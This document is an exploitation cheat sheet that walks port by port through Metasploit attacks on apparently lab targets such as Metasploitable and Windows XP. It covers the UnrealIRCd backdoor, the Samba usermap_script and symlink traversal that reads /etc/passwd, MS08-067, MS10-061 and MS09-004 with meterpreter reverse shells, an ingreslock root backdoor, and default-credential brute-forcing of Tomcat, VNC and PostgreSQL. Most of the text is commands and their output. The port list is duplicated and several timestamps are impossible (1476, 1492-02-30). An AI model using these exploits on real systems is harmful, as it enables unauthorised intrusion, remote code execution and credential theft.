// Open Port Exploits
port 6667 - Unreal ircd (win/linux)
port 1524 - ingreslock (linux)
port 8180 - tomcat_mgr_login (win/linux)
port 139 - (linux)
port 139/445 - (linux)
port 445 - (linux)
port 135 - msrpc (win)
port 445 - microsoft-ds (win)
port 1433 - ms-sql-s (win)
port 5900 - vnc (win/linux)
port 5432 - postgresql (linux)
port 25 - smtp
port 3306 - mysql (linux)
port 21 - FTP (linux)
port 1524 - ingreslock (linux)
port 8180 - tomcat_mgr_login (win/linux)
port 139 - (linux)
port 139/445 - (linux)
port 445 - (linux)
port 135 - msrpc (win)
port 445 - microsoft-ds (win)
port 1433 - ms-sql-s (win)
port 5900 - vnc (win/linux)
port 5432 - postgresql (linux)
port 25 - smtp
port 3306 - mysql (linux)
port 21 - FTP (linux)
// exploits bellow tested with backtrack 5
----------------------------------------------------------------------------------
port 6667 - Unreal ircd (win/linux)
root@bt:~# nmap -sV -sC -v -p 6667 IP-Address
6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.1.20:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100
----------------------------------------------------------------------------------
port 1524 - ingreslock (linux)
1524/tcp open ingreslock?
The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:
root@bt# telnet 192.168.1.20 1524
Trying 192.168.1.20...
Connected to 192.168.1.20.
Escape character is '^]'.
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)
----------------------------------------------------------------------------------
port 8180 - tomcat_mgr_login (win/linux)
msf auxiliary(tomcat_mgr_login) > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rport 8180
msf auxiliary(tomcat_mgr_login) > set rhosts Remote-IP-Address
msf auxiliary(tomcat_mgr_login) > run
[*] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - Trying username:'admin' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - Trying username:'manager' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - Trying username:'role1' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - Trying username:'root' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - Trying username:'tomcat' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - Trying username:'both' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - Trying username:'j2deployer' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - Trying username:'ovwebusr' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - Trying username:'cxsdk' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - Trying username:'ADMIN' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - Trying username:'xampp' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - Trying username:'admin' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - Trying username:'manager' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - Trying username:'role1' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - Trying username:'root' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [16/56] - Trying username:'tomcat' with password:'tomcat'
[+] http://Remote-IP-Address:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - Trying username:'both' with password:'both'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - Trying username:'j2deployer' with password:'j2deployer'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - Trying username:'cxsdk' with password:'cxsdk'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - Trying username:'ADMIN' with password:'ADMIN'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - Trying username:'xampp' with password:'xampp'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - Trying username:'cxsdk' with password:'kdsxc'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - Trying username:'root' with password:'owaspbwa'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - Trying username:'admin' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - Trying username:'admin' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - Trying username:'admin' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - Trying username:'admin' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - Trying username:'admin' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - Trying username:'manager' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - Trying username:'manager' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - Trying username:'manager' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - Trying username:'manager' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - Trying username:'manager' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - Trying username:'role1' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - Trying username:'role1' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - Trying username:'role1' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - Trying username:'role1' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - Trying username:'role1' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - Trying username:'root' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - Trying username:'root' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - Trying username:'root' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - Trying username:'root' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - Trying username:'root' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - Trying username:'both' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - Trying username:'both' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - Trying username:'both' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - Trying username:'both' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - Trying username:'both' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - Trying username:'both' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
----------------------------------------------------------------------------------
port 139 - (linux)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
root@bt:# smbclient -L //Remote-IP-Address
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.99.131\tmp\rootfs\
msf auxiliary(samba_symlink_traversal) > exit
root@bt:# smbclient //Remote-IP-Address1/tmp
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[..]
----------------------------------------------------------------------------------
port 139/445 - (linux)
samba "username map script" command execution
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set rhost Remote-IP-Addres
msf exploit(usermap_script) > set lhost Local-IP-Address
msf exploit(usermap_script) > set rport 139 or 445 (both will work)
msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo AGo0tmuVPzZXPNPw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "AGo0tmuVPzZXPNPw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Addres:51822) at 2012-10-05 14:35:10 +0100
----------------------------------------------------------------------------------
port 445 - (linux)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
root@bt:# smbclient -L //Remote-IP-Address
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.99.131\tmp\rootfs\
msf auxiliary(samba_symlink_traversal) > exit
root@bt:# smbclient //Remote-IP-Address1/tmp
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[..]
----------------------------------------------------------------------------------
port 135 - msrpc (win)
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set lhost IP-Address
msf exploit(ms03_026_dcom) > set rhost IP-Address
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on IP-Address:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Sending exploit ...
----------------------------------------------------------------------------------
port 445 - microsoft-ds (win)
use windows/smb/ms08_067_netapi
set rhost 192.168.0.200
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit
[*] Started reverse handler on 192.168.0.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 192.168.0.200
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)
Once done you need to open the console by typing the bellow after the >
meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…
Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.
myexploit.wordpress.com/control-smb-445-137-139/
And local printer exploit
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 13208
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck
hdm
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse handler on Local-IP-Address:4444
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc ...
[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036
[*] Job started: 0x2
[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe
[*] Job started: 0x3
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (752128 bytes) to Remote-IP-Address
[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000
meterpreter >
----------------------------------------------------------------------------------
port 1433 - ms-sql-s (win)
msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address
lhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address
rhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit
[*] Started reverse handler on IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to IP-Address
[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100
----------------------------------------------------------------------------------
port 5900 - vnc (win/linux)
root@bt:~# nmap -sS -sC -p 5900 IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
5900/tcp open vnc
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
MAC Address: 08:00:27:EB:18:CC (Micky Systems)
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt
msf auxiliary(vnc_login) > set rhosts IP-Address
msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3
msf auxiliary(vnc_login) > run
[*] IP-Address:5900 - Starting VNC login sweep
[*] IP-Address:5900 VNC - [01/18] - Attempting VNC login with password ''
[*] IP-Address:5900 VNC - [01/18] - , VNC server protocol version : 3.3
[-] IP-Address:5900 VNC - [01/18] - , Authentication failed
[*] IP-Address:5900 VNC - [02/18] - Attempting VNC login with password 'password'
[*] IP-Address:5900 VNC - [02/18] - , VNC server protocol version : 3.3
[+] IP-Address:5900, VNC server password : "password"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2. Open vncviewer or tsclient
root@bt:~# vncviewer ip-address:5900
root@bt:~# tsclient
Computer = IP-Address
Protocol = VNC
Username = leave blank
Press connect
3. A Password box will open type in password press enter.
port 8180 - tomcat_mgr_login (win/linux)
----------------------------------------------------------------------------------
port 5432 - postgresql (linux)
root@bt:~# nmap -sV -p 22,5432 --open Remote-IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-05 15:46 BST
Nmap scan report for Remote-IP-Address
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 01:02:03:04:05:06 (Micky Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds
msf > search PostgreSQL
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload 2009-04-10 00:00:00 UTC excellent PostgreSQL for Microsoft Windows Payload Execution
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts Remote-IP-Address
msf auxiliary(postgres_login) > exploit
[*] Remote-IP-Address:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'postgres':''
[-] Remote-IP-Address:5432 Postgres - [01/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':''
[-] Remote-IP-Address:5432 Postgres - [02/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':''
[-] Remote-IP-Address:5432 Postgres - [03/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':''
[-] Remote-IP-Address:5432 Postgres - [04/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] Remote-IP-Address:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] Remote-IP-Address:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Remote-IP-Address:5432 Postgres - Disconnected
[*] Remote-IP-Address:5432 Postgres - [06/21] - Trying username:'scott' with password:'scott' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'scott'
[-] Remote-IP-Address:5432 Postgres - [06/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [07/21] - Trying username:'admin' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'admin'
[-] Remote-IP-Address:5432 Postgres - [07/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [08/21] - Trying username:'admin' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'password'
[-] Remote-IP-Address:5432 Postgres - [08/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [09/21] - Trying username:'' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'tiger'
